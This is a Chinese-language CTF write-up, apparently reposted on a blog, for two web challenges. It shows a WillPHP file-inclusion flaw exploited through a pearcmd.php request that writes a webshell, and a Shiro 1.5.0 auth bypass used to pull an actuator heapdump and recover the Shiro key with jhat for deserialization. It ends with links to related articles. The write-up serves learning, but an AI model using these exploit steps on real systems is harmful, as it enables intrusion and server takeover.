摘要:前言总的来说的话,题目质量还是不错的,另外那道也是解,也幸好自己是一点都不会寒假补一波,卷是真的卷。我用了自带的经过一番寻找找到了转换一下然后工具直接梭
总的来说的话,题目质量还是不错的,另外那道XSS也是0解,也幸好自己是一点XSS都不会(寒假补一波),卷是真的卷。还有很多的东西自己对其的认识都只停留在表面吧,还是得慢慢学习。除了shiro的鉴权绕过是自己之前专门学过的,所以打开pom.xml看到1.5.0的版本立马就知道这题得有个鉴权绕过,别的,剩下的打shiro一开始没打通才换了工具打(后来才发现我一直在拿cc的链子打,我说怎么打不通。。。)。还是慢慢学习了。
打开页面发现是个WillPHP,而且应该就是assign的模板渲染了,而且根据这个东西和tp有点关联,联想到tp的那个assign实现的文件包含。去下载源码跟一下,发现是在这里出现了任意文件包含
public static function renderTo($viewfile, $vars = []) { $m = strtolower(__MODULE__); $cfile = "view-".$m."_".basename($viewfile).".php"; if (basename($viewfile) == "jump.html") { $cfile = "view-jump.html.php"; } $cfile = PATH_VIEWC."/".$cfile; if (APP_DEBUG || !file_exists($cfile) || filemtime($cfile) < filemtime($viewfile)) { echo "123"; $strs = self::compile(file_get_contents($viewfile), $vars); var_dump($cfile); file_put_contents($cfile, $strs); } extract($vars); include $cfile;但是找不到flag,发现pearcmd.php包含可以利用,直接打就可以了:
GET /?name=cfile&value=/usr/local/lib/php/pearcmd.php&+-c+/tmp/.feng.php+-d+man_dir=+-s+ HTTP/1.1就把马写在了/tmp/.feng.php,再包含之即可:
pom.xml里面有个shiro 1.5.0。
打开网站发现没什么东西,扫了一下(bushi)扫到了actuator,但是很明显需要shiro得鉴权绕过:
/;/actuator/env找到了这篇文章:https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html
利用heapdump找到shiro的key来实现反序列化攻击。通过访问/;/actuator/heapdump下载下来,然后找key。
但是文章里的那个工具我本地用不了。。。我用了jdk自带的:
D:/environment/jdk8u302-b08/bin>jhat.exe C:/Users/15997/Desktop/heapdumpReading from C:/Users/15997/Desktop/heapdump...Dump file created Sun Nov 14 14:39:57 CST 2021Snapshot read, resolving...Resolving 286122 objects...Chasing references, expect 57 dots.........................................................Eliminating duplicate references.........................................................Snapshot resolved.Started HTTP server on port 7000Server is ready.经过一番寻找找到了key:
转换一下:
import base64s= "0xa1, 0x58, 0xba, 0xdd, 0xa3, 0x90, 0xf8, 0x09, 0x2b, 0x92, 0x5e, 0xe4, 0x04, 0x8a, 0x42, 0x34"print(s.replace(", ","").replace("0x",r"/x"))ss=b"/xa1/x58/xba/xdd/xa3/x90/xf8/x09/x2b/x92/x5e/xe4/x04/x8a/x42/x34"print(base64.b64encode(ss))#b"oVi63aOQ+Akrkl7kBIpCNA=="然后工具直接梭:
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/123424.html
摘要:年莲城杯网络安全大赛一血题目名称题目内容你听说过吗靶机题目分值题目难度容易解题思路根据提示,生成一个序列化文件上传该文件即可 2021年莲城杯网络安全大赛-Web-...
摘要:年莲城杯网络安全大赛题目名称题目内容扫个雷吧三个难度都通关了即可获得哦靶机题目分值题目难度容易解题思路查看源代码代码打开定位通关查到关键字符控制台运行输出 2021...
摘要:登录功能传和。尝试弱口令登录成功但是提示并不在这里。尝试注入但是了因此利用注入。数据库名的话很好注入直接不用用也可以注出是了然后开始注表名。 easy_sql_2 ...
摘要:安全的战队经常参与各大比赛,了解赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。欢迎各位大佬小白入驻,大家一起打,一起进步。有意向的师傅请联系邮箱带上自己的简历,简历内容包括自己的学习方向,学习经历等 ...
摘要:文章目录一你应该知道的蓝桥杯含金量获奖率高不高支持哪些编程语言二川川带你体验蓝桥杯省赛蓝桥杯蓝桥杯三个人感受一你应该知道的蓝桥杯如果你是计算机相关专业,你不知蓝桥杯就过不去了,我们来看看蓝桥杯如何,不知道更应该来了解下了。 ...
阅读 614·2023-04-26 00:13
阅读 2078·2021-11-24 09:39
阅读 2178·2021-11-23 10:08
阅读 3134·2021-11-16 11:39
阅读 882·2021-10-18 13:24
阅读 2056·2021-09-08 09:36
阅读 2264·2021-09-01 10:41
阅读 1995·2021-08-27 16:25
